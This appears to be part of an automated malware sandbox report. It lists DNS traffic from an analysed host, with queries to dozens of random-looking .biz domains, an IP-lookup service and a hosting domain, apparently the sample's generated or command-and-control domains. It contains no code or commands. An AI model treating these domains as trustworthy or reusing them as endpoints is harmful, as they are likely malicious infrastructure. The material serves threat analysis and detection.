                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.542856932 CET5478453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.549961090 CET53547841.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.381982088 CET5484153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.390134096 CET53548411.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.965744972 CET6119453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.975738049 CET53611941.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.236407995 CET5293653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.243745089 CET53529361.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.079943895 CET6168553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.087251902 CET53616851.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.492145061 CET5239353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.500591993 CET53523931.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.935467958 CET5727553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.965759993 CET5727553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.214063883 CET5748653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.215684891 CET53572751.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.215711117 CET53572751.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.221208096 CET53574861.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.705864906 CET5636353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.714639902 CET53563631.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.800775051 CET5694153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.808634996 CET53569411.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.809329987 CET6437653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.816709995 CET53643761.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.571599960 CET5650053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.579643011 CET53565001.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.279855013 CET5826053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.287154913 CET53582601.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.937752008 CET5597653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.947391033 CET53559761.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.949760914 CET5413953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.957375050 CET53541391.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.961751938 CET5597753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.969521999 CET53559771.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.012873888 CET5549253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.020674944 CET53554921.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.915997982 CET5546453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.927092075 CET53554641.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:50.606079102 CET5722953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:50.614737034 CET53572291.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.472233057 CET6150453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.480401039 CET53615041.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.176280022 CET6194553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.199852943 CET6194553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.275578976 CET53619451.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.276009083 CET53619451.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.121767998 CET5543953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.129270077 CET53554391.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.973263025 CET5823253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.981697083 CET53582321.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:54.832979918 CET5297653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:54.842189074 CET53529761.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:56.309295893 CET6276053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:56.316534042 CET53627601.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.170142889 CET5243053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.177561998 CET53524301.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.859144926 CET4972653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.866249084 CET53497261.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.207818031 CET6329053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.214648962 CET53632901.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.215356112 CET6332753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.222657919 CET53633271.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.939558029 CET6341553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.947098017 CET53634151.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.692629099 CET5479253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.701354027 CET53547921.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.702120066 CET6367453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.712205887 CET53636741.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.712905884 CET5435753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.719713926 CET53543571.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:11.934891939 CET5892453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:11.941885948 CET53589241.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:13.435702085 CET5564253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:13.442914963 CET53556421.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:14.921685934 CET6338053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:14.949841022 CET6338053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.021334887 CET53633801.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.021348953 CET53633801.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.723961115 CET5546353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.731262922 CET53554631.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.212035894 CET5130353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.219975948 CET53513031.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.710921049 CET6537753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.718348026 CET53653771.1.1.1192.168.2.10

                                                                                                                                                                                                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:16.262578011 CET192.168.2.101.1.1.10x3fb8Standard query (0)gxe0.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:28.437925100 CET192.168.2.101.1.1.10x2ee6Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:30.149840117 CET192.168.2.101.1.1.10x6e36Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:30.252301931 CET192.168.2.101.1.1.10xa5cdStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:32.928847075 CET192.168.2.101.1.1.10xe995Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:33.050607920 CET192.168.2.101.1.1.10xa4b5Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:33.097707033 CET192.168.2.101.1.1.10x6ce9Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:34.673696995 CET192.168.2.101.1.1.10xd4c3Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:35.157710075 CET192.168.2.101.1.1.10x9562Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:36.575900078 CET192.168.2.101.1.1.10xc4bdStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:37.165791988 CET192.168.2.101.1.1.10xdb40Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.044739962 CET192.168.2.101.1.1.10x520Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.309633970 CET192.168.2.101.1.1.10xa2c9Standard query (0)s82.gocheapweb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.344249010 CET192.168.2.101.1.1.10xd4d0Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.352389097 CET192.168.2.101.1.1.10xc591Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.897211075 CET192.168.2.101.1.1.10xdc1aStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.906517029 CET192.168.2.101.1.1.10xa963Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.922405005 CET192.168.2.101.1.1.10xbeb7Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:41.386504889 CET192.168.2.101.1.1.10x89eaStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:41.443006992 CET192.168.2.101.1.1.10x1e42Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.414771080 CET192.168.2.101.1.1.10x9c94Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.460711956 CET192.168.2.101.1.1.10x92d3Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.472605944 CET192.168.2.101.1.1.10xf6c9Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:44.891488075 CET192.168.2.101.1.1.10xe9aStandard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.633254051 CET192.168.2.101.1.1.10x545aStandard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.778592110 CET192.168.2.101.1.1.10x36bdStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:12.791233063 CET192.168.2.101.1.1.10x36bdStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.919965982 CET192.168.2.101.1.1.10x7e9eStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.204062939 CET192.168.2.101.1.1.10xd42fStandard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.788466930 CET192.168.2.101.1.1.10x69Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.522500038 CET192.168.2.101.1.1.10x7ca0Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.800151110 CET192.168.2.101.1.1.10xe847Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.547219992 CET192.168.2.101.1.1.10x2648Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.600056887 CET192.168.2.101.1.1.10x31a1Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.231096029 CET192.168.2.101.1.1.10xafe7Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.543577909 CET192.168.2.101.1.1.10x107aStandard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.617479086 CET192.168.2.101.1.1.10x62bStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.626003981 CET192.168.2.101.1.1.10xb664Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.113817930 CET192.168.2.101.1.1.10xa8baStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.122668982 CET192.168.2.101.1.1.10xf7aaStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.129780054 CET192.168.2.101.1.1.10xa93fStandard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.375494957 CET192.168.2.101.1.1.10x43b7Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.486289978 CET192.168.2.101.1.1.10x81bStandard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.290910959 CET192.168.2.101.1.1.10x5677Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.806731939 CET192.168.2.101.1.1.10xdc07Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:27.521691084 CET192.168.2.101.1.1.10xcf08Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:28.325238943 CET192.168.2.101.1.1.10xe0c1Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.576394081 CET192.168.2.101.1.1.10x60ffStandard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.571335077 CET192.168.2.101.1.1.10xdfaaStandard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.408695936 CET192.168.2.101.1.1.10xb4c5Standard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.579896927 CET192.168.2.101.1.1.10x35baStandard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:33.562392950 CET192.168.2.101.1.1.10x4749Standard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:34.580204964 CET192.168.2.101.1.1.10xad95Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:35.704005957 CET192.168.2.101.1.1.10x9c91Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:36.812973976 CET192.168.2.101.1.1.10xe20cStandard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:38.639296055 CET192.168.2.101.1.1.10x1f8bStandard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.151489019 CET192.168.2.101.1.1.10xa3b7Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.615215063 CET192.168.2.101.1.1.10x9aa7Standard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:40.637921095 CET192.168.2.101.1.1.10x1368Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:42.895858049 CET192.168.2.101.1.1.10x9abfStandard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:42.904335022 CET192.168.2.101.1.1.10x9db4Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.923489094 CET192.168.2.101.1.1.10x57deStandard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:45.682910919 CET192.168.2.101.1.1.10xf6a6Standard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:47.467381954 CET192.168.2.101.1.1.10xb50Standard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:49.112123966 CET192.168.2.101.1.1.10x204fStandard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:50.174345016 CET192.168.2.101.1.1.10x94b2Standard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:51.874341965 CET192.168.2.101.1.1.10x614aStandard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:53.692799091 CET192.168.2.101.1.1.10x1409Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:54.755430937 CET192.168.2.101.1.1.10xa6d5Standard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.760298967 CET192.168.2.101.1.1.10xd737Standard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.202353954 CET192.168.2.101.1.1.10x5e68Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.868465900 CET192.168.2.101.1.1.10xcfbdStandard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.716553926 CET192.168.2.101.1.1.10x7462Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:58.170501947 CET192.168.2.101.1.1.10x358Standard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.203202009 CET192.168.2.101.1.1.10xf938Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.472573042 CET192.168.2.101.1.1.10x1a48Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.891503096 CET192.168.2.101.1.1.10xf7beStandard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:01.143949986 CET192.168.2.101.1.1.10xa89bStandard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:01.382317066 CET192.168.2.101.1.1.10x8829Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.277091026 CET192.168.2.101.1.1.10x372aStandard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.749799013 CET192.168.2.101.1.1.10xd431Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:03.905889034 CET192.168.2.101.1.1.10xeb0dStandard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:03.992672920 CET192.168.2.101.1.1.10xb0baStandard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.029887915 CET192.168.2.101.1.1.10x49d2Standard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.038110971 CET192.168.2.101.1.1.10x198bStandard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.180902004 CET192.168.2.101.1.1.10x199Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.997026920 CET192.168.2.101.1.1.10x2102Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:06.766263962 CET192.168.2.101.1.1.10x8beeStandard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:07.477111101 CET192.168.2.101.1.1.10x7428Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:07.990715027 CET192.168.2.101.1.1.10xbe24Standard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:08.182025909 CET192.168.2.101.1.1.10x9584Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.046464920 CET192.168.2.101.1.1.10x4c4dStandard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.934986115 CET192.168.2.101.1.1.10x1ccStandard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.023171902 CET192.168.2.101.1.1.10xabddStandard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.607137918 CET192.168.2.101.1.1.10x92e9Standard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.537195921 CET192.168.2.101.1.1.10x38caStandard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
